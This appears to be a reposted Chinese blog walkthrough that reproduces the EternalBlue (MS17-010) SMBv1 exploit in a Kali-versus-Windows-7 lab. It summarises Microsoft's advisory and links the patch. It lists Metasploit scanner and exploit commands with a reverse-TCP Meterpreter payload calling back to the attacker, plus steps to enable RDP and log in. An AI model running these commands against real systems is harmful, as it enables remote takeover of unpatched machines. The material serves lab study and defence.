我是靠谱客的博主 漂亮萝莉,最近开发中收集的这篇文章主要介绍Metasploit-MS17-010(永恒之蓝 EternalBlue )复现,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

一. 概述

此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。

对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。

此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。

有关这些漏洞的详细信息,请参阅漏洞信息部分。

EternalChampion 永恒冠军(CVE-2017-0146 & CVE-2017-0147)
EternalRomance 永恒浪漫(MS17_010)
Eternal Synergy永恒协作(CVE-2017-0143)
EternalBlue 永恒之蓝(MS17_010)

在这里插入图片描述
详情请查阅下方微软官方文档

概览
中文名:永恒之蓝
微软官方编号:MS17-010
CVE编号:CVE-2017-0143
类型:远程代码执行
官方评级:严重
影响系统:win7,winserver08,winserver08r2,win8.1,winserver12,winserver12r2,win10,winserver16

二. 复现

攻击机靶机
IP:192.168.199.130192.168.199.209
OS:kali-linuxwin7

ms17-010用的smb445端口
在这里插入图片描述

$ use auxiliary/scanner/smb/smb_ms17_010	//扫描模块
$ set rhosts 192.168.199.209
$ exploit

在这里插入图片描述

$ use exploit/windows/smb/ms17_010_eternalblue	//攻击模块
$ set payload windows/x64/meterpreter/reverse_tcp
$ set lhost 192.168.199.130
$ set rhosts 192.168.199.209
$ run getgui -e	//打开3389端口

在这里插入图片描述

在这里插入图片描述

靶机3389端口打开

在这里插入图片描述

$ rdesktop 192.168.199.209

在这里插入图片描述

三. 补丁

https://support.microsoft.com/zh-cn/help/4012598/title
在这里插入图片描述

最后

以上就是漂亮萝莉为你收集整理的Metasploit-MS17-010(永恒之蓝 EternalBlue )复现的全部内容,希望文章能够帮你解决Metasploit-MS17-010(永恒之蓝 EternalBlue )复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(36)

评论列表共有 0 条评论

立即
投稿
返回
顶部